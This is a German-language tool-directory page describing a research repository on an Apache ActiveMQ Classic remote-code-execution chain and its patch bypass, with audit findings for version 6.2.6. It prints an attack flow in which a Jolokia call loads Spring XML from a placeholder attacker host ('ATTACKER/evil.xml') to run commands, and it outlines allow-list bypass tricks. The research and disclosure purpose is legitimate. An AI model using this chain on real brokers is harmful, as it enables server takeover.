Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
apache-activemq-rce-research — Apache ActiveMQ Classic RCE Forschung: CVE-2026-34197 / CVE-2026-42588 Bypass-Kette + hardened-6.2.6 Prüfungsergebnisse + Crowdfense Vergleich | Kitploit
Tools/GitHubGitHub/dinosn/apache-activemq-rce-research
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & BildungPayload-Entwicklung
GitHubdinosn/apache-activemq-rce-research

apache-activemq-rce-research

Apache ActiveMQ Classic RCE Forschung: CVE-2026-34197 / CVE-2026-42588 Bypass-Kette + hardened-6.2.6 Prüfungsergebnisse + Crowdfense Vergleich

Repository anzeigen
8413vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache ActiveMQ Classic – RCE-Forschung

Privates Forschungsarchiv für die Apache ActiveMQ Classic Jolokia → addNetworkConnector → xbean/Spring-XML Remote-Code-Execution-Kette (CVE-2026-34197 und deren Patch-Bypass CVE-2026-42588), plus ein vollständiges automatisches Forschungsaudit der behobenen Version 6.2.6 und ein direkter Vergleich mit Crowdfenses öffentlichem Bypass-Artikel.

Alle Exploitationen wurden gegen lokale Lab-Broker (Docker / selbst gehostet) durchgeführt. Payloads verwenden Platzhalter-Angreifer-Hosts.


Inhaltsverzeichnis

Verz.PhaseInhalt
00-comparison-vs-crowdfense.mdVergleichUnsere Arbeit vs. den Crowdfense-Artikel „ActiveMQ RCE Bypass", quellenverifiziert an Datei:Zeile
01-original-cve-2026-34197/Original-NachvollzugAnalyse + PoC-Skripte + Spring-XML-Payloads (Labor: activemq-classic:5.18.6)
02-reaudit-apr30/Versionsmatrixuid=0 auf 5.18.3 / 5.18.6 / 6.1.4 / 6.1.7; Bewertung + PoC + version-matrix.sh
03-reaudit-42588-42253/Live-BypassComposite-Bypass ohne Klammern (42588) + MessageServlet XSS (42253), live reproduziert
04-audit-6.2.6/Vollständiges AuditAuto-Forschungsaudit der gehärteten 6.2.6: Abschlussbericht + Ergebnisliste

Quelltextbäume und Binärverteilungen des Herstellers, die während der Labore verwendet wurden, sind absichtlich ausgeschlossen (sie stammen vom Upstream, nicht von uns).


Die Schwachstelle in einem Satz

Ein authentifizierter (bei 6.0.0–6.1.1 unauthentifiziert über CVE-2024-32114) Jolokia-Aufrufer ruft BrokerView.addNetworkConnector(uri) mit einer manipulierten Discovery-URI auf, deren innerer vm://…?brokerConfig=xbean:<url> den Broker zwingt, ein angreifergesteuertes Spring-XML zu laden, das eifrig einen ProcessBuilder-Bean vor der Broker-Validierung instanziiert → Betriebssystem-Befehlsausführung.

POST /api/jolokia/  →  BrokerView.addNetworkConnector(String)
  →  static:(vm://evil?brokerConfig=xbean:http://ATTACKER/evil.xml)
  →  VMTransportFactory dynamic broker creation  →  XBeanBrokerFactory
  →  ResourceXmlApplicationContext loads Spring XML  →  ProcessBuilder bean  →  RCE

Ergebnisse

Schlagzeile: Drei Ergebnisse sind live nachgewiesen für Root/XSS; das 6.2.6-Audit fügt eine breitere Menge hinzu, die quellenverifiziert und feindlich bewertet, aber noch nicht live detoniert ist. Keines der 6.2.6-Erweiterungen ist eine neue unauthentifizierte RCE – der Anbieter hat diese Türen geschlossen; das Restrisiko verlagerte sich auf Autorisierung und Ausgabekodierung.

Nachgewiesene Exploitation-Kette

IDErgebnisKlasseSchweregradAuthentifizierungNachweis
CVE-2026-34197Jolokia addNetworkConnector → xbean Spring-XML RCERCEKritischNach Authentifizierung (unauthentifiziert 6.0.0–6.1.1)Live – uid=0 auf 5.18.3 / 5.18.6 / 6.1.4 / 6.1.7
CVE-2026-42588Composite-URI-Bypass ohne Klammern der 34197-ListeRCE (Patch-Bypass)KritischNach AuthentifizierungLive – uid=0 auf 34197-gepatchtem 5.19.6 + 6.2.0
CVE-2026-42253MessageServlet Header-Injection → gespeichertes XSSInjection / XSSMittelNach AuthentifizierungLive auf 6.2.0

Neue Ergebnisse aus dem 6.2.6-Audit (quellenverifiziert)

IDErgebnisKlasseSchweregradAuthentifizierungAnmerkungen
C1static: Lücke in der Sperrliste → SSRF – static fehlt in DENIED_TRANSPORT_SCHEMES; addNetworkConnector("static:(tcp://…)") → ausgehender Broker-TCPSSRFMittelAdmin / JMXSink-Variante hinter derselben 34197/42588-Sperrliste, die der Artikel behandelt
B1Cross-clientId-Löschung-IDOR bei dauerhaften Abonnements – removeSubscription verwendet die drahtgelieferte clientId und ist in AuthorizationBroker nicht abgesichertFehlerhafte Autorisierung / IDORMittelNach Authentifizierung (vor Authentifizierung, wenn Broker-Auth aus)Sauberstes neues Ergebnis
B3LDAP leeres Passwort → anonymer Bind (LDAPLoginModule, keine Leerprüfung)AuthentifizierungsumgehungMittel (bedingt)Vor AuthentifizierungAbhängig davon, dass das Verzeichnis anonyme Bindungen akzeptiert
A1–A7Konsolen Ausgabekodierungs-Injektionsfamilie – angreifergesteuertes MessageId.textView (OpenWire v10+ & AMQP) nicht maskiert über ~7 JSP/REST-Senken + FileSystemBlobStrategy Pfad-TraversalInjektionNiedrig–MittelProduzent → AdministratorStandardmäßig durch CSP auf HTML/Content-Injektion beschränkt
B2Shiro WildcardPermission Doppelpunkt-Injektion Verb-HochstufungPrivilegienerweiterungNiedrig–MittelNach AuthentifizierungShiro nicht standardmäßig
B4Temp-Destination-Autorisierung Fail-Open-Asymmetrie vs. Nicht-Temp-Fail-ClosedFehlerhafte AutorisierungNiedrigNach AuthentifizierungDesignbedingt (AMQ-4721); Härtungshinweis
B5StatisticsBroker replyTo überspringt Schreib-ACL, wenn Plugin vor Autorisierung angeordnet istFehlerhafte AutorisierungNiedrigNach AuthentifizierungAbhängig von der Konfigurationsreihenfolge
B6Cert-Login nicht-kanonischer DN (getSubjectDN().getName()) → Identitätskollision unter Zertifikaten derselben CAAuthentifizierungNiedrigVor Authentifizierung (TLS-validiert)„Jedes selbstsignierte Zertifikat" funktioniert nicht
B7JMSXUserID Spoofing, wenn populateJMSXUserID=false (Standard)SpoofingNiedrigNach Authentifizierung—
F5STOMP ausgehender Header-Name nie maskiert → Frame-Injection an Co-Tenant-AbonnentenInjektionNiedrigProtokollübergreifendSTOMP aktiviert

Nicht im Fokus – DoS (katalogisiert, nicht Schlagzeile)

MQTT QoS ordinal AIOOBE (QoS.values()[ordinal], protokollübergreifend, keine Konfiguration) · OpenWireFormat.DEFAULT_MAX_FRAME_SIZE = Long.MAX_VALUE · signed-short NegativeArraySizeException in OpenWire-Unmarshal · negative AMQ_SCHEDULED_REPEAT unsterblicher Job.


Vergleich mit dem Crowdfense-Artikel

Crowdfenses Apache ActiveMQ RCE Bypass behandelt die gleiche Kette (sie führen sie unter CVE-2026-34197; wir verfolgen den Bypass als eigenen CVE-2026-42588). Beide Darstellungen stimmen in einer dreischichtigen Verteidigung überein; die einzige Abweichung ist Schicht 2.

LayerVerteidigungCrowdfense umgeht es durchWir umgingen es durch
1Schema Sperrliste (34197-Fix)Composite ohne Klammern static:vm://…Gleich – unabhängig gefunden ✅
2xbean {file,classpath} Erlaubnisliste (#1910)Prozentkodiertes file:%2f%2f… → Windows UNC → WebDAV → entfernter HTTP-AbrufLokale Datei xbean:/tmp/evil.xml (erfordert lokalen Schreibzugriff)
3VMTransportFactory Schema-Gate (broker,properties, der 42588/6.2.6-Fix)Als endgültig anerkanntGleiche Schlussfolgerung ✅
Tool herunterladen